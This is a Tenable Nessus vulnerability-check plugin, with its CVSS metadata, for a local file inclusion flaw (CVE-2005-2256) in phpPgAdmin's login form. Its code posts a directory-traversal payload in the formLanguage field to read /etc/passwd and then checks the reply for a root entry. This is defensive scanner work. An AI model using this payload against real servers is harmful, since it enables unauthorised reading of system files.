CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
EPSS
Percentile
87.2%
The remote host is running phpPgAdmin, a web-based administration tool for PostgreSQL.
The installed version of phpPgAdmin fails to filter directory traversal sequences from user input supplied to the ‘formLanguage’ parameter of the login form. An attacker can exploit this issue to read files outside the application’s document directory and to include arbitrary PHP files from the remote host, subject to the privileges of the web server userid.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description) {
script_id(18637);
script_version("1.19");
script_cve_id("CVE-2005-2256");
script_bugtraq_id(14142);
script_name(english:"phpPgAdmin index.php formLanguage Parameter Local File Inclusion");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is affected by a
local file include vulnerability." );
script_set_attribute(attribute:"description", value:
"The remote host is running phpPgAdmin, a web-based administration tool
for PostgreSQL.
The installed version of phpPgAdmin fails to filter directory
traversal sequences from user input supplied to the 'formLanguage'
parameter of the login form. An attacker can exploit this issue to
read files outside the application's document directory and to include
arbitrary PHP files from the remote host, subject to the privileges of
the web server userid." );
script_set_attribute(attribute:"see_also", value:"http://www.vuxml.org/freebsd/88188a8c-eff6-11d9-8310-0001020eed82.html" );
script_set_attribute(attribute:"see_also", value:"http://sourceforge.net/project/shownotes.php?release_id=342261" );
script_set_attribute(attribute:"solution", value:
"Upgrade to phpPgAdmin 3.5.4 or later." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_publication_date", value: "2005/07/07");
script_set_attribute(attribute:"vuln_publication_date", value: "2005/07/04");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:phppgadmin:phppgadmin");
script_end_attributes();
script_summary(english:"Checks for formLanguage parameter directory traversal vulnerability in phpPgAdmin");
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
script_require_keys("www/PHP");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);
# Loop through CGI directories.
foreach dir (cgi_dirs()) {
# Check whether the login script exists.
r = http_send_recv3(method:"GET",item:string(dir, "/login.php"), port:port);
if (isnull(r)) exit(0);
res = r[2];
# If it does...
if ('/login.php" method="post" name="login_form">' >< res) {
# Try to exploit the flaw to read /etc/passwd.
postdata = string(
"formUsername=", SCRIPT_NAME, "&",
"formPassword=nessus&",
"formServer=0&",
"formLanguage=../../../../../../../../../../etc/passwd%00&",
"submitLogin=Login"
);
r = http_send_recv3(method:"POST", item: dir + "/login.php", port: port,
content_type: "application/x-www-form-urlencoded",
data: postdata);
if (isnull(r)) exit(0);
res = r[2];
# There's a problem if there's an entry for root.
if (egrep(string:res, pattern:"root:.*:0:[01]:")) {
security_warning(port);
exit(0);
}
}
}